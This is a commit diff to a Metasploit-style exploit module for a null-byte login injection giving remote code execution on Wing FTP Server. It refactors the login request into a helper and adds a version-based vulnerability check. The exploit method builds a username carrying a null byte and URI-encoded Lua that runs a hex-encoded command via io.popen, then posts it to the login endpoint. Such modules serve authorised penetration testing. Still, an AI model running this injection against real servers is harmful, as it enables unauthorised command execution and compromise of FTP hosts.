DRY code, grab wingftp version in check method

Chocapikk · Chocapikk · commit 7629dd751883 · 2025-07-05T22:25:45.000+02:00
diff --git a/modules/exploits/multi/http/wingftp_null_byte_rce.rb b/modules/exploits/multi/http/wingftp_null_byte_rce.rb
@@ -66,33 +66,51 @@ def initialize(info = {})
     )
   end
 
+  def uid_cookie(res)
+    res&.get_cookies_parsed&.[]('UID')
+  end
+
+  def post_login(username, password)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'loginok.html'),
+      'uri_encode_mode' => 'none',
+      'headers' => {
+        'Referer' => normalize_uri(target_uri.path, 'login.html') + '?lang=english'
+      },
+      'vars_post' => {
+        'username' => username,
+        'password' => password,
+        'username_val' => username.split('%00').first,
+        'password_val' => password
+      }
+    )
+  end
+
   def check
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'login.html')
     )
     return CheckCode::Safe('Not a Wing FTP Web Client') unless res&.body&.include?('Wing FTP Server - Web Client')
 
+    if (ver_str = res.body[/Wing FTP Server v([\d.]+)/i, 1])
+      ver = Rex::Version.new(ver_str)
+      return ver < Rex::Version.new('7.4.4') ? CheckCode::Vulnerable("Detected version #{ver} ≤ 7.4.4") : CheckCode::Safe("Detected version #{ver} > 7.4.4")
+    end
+
     suffix = Rex::Text.rand_text_alpha(8)
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
-    payload = "username=#{user}%00#{suffix}&password=#{pass}&username_val=#{user}&password_val=#{pass}"
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'loginok.html'),
-      'headers' => {
-        'Content-Type' => 'application/x-www-form-urlencoded',
-        'Referer' => normalize_uri(target_uri.path, 'login.html') + '?lang=english'
-      },
-      'data' => payload
-    )
-    return CheckCode::Unknown('No response') unless res
 
-    uid = res.get_cookies_parsed.fetch('UID', nil)
-    return CheckCode::Appears("UID cookie received: #{uid}") if uid
+    res2 = post_login("#{user}%00#{suffix}", pass)
+    return CheckCode::Unknown('No response') unless res2
 
-    CheckCode::Safe('UID cookie not found; not vulnerable')
+    if uid_cookie(res2)
+      CheckCode::Appears('UID cookie received')
+    else
+      CheckCode::Safe('UID cookie not found; not vulnerable')
+    end
   end
 
   def exploit
@@ -109,25 +127,12 @@ def exploit
       end
       local cmd = hx("#{hex}")
       local h = io.popen(cmd)
-      local r = h:read("*a")
       h:close()
     LUA
 
     inj = "#{user}%00" + Rex::Text.uri_encode(lua).gsub('%0a', '%0d') + '--'
 
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, 'loginok.html'),
-      'headers' => {
-        'Referer' => normalize_uri(target_uri.path, 'login.html') + '?lang=english'
-      },
-      'vars_post' => {
-        'username' => inj,
-        'password' => pass,
-        'username_val' => user,
-        'password_val' => pass
-      }
-    )
+    res = post_login(inj, pass)
     fail_with(Failure::UnexpectedReply, 'Injection failed') unless res&.code == 200
 
     uid = res.get_cookies_parsed.fetch('UID', nil)
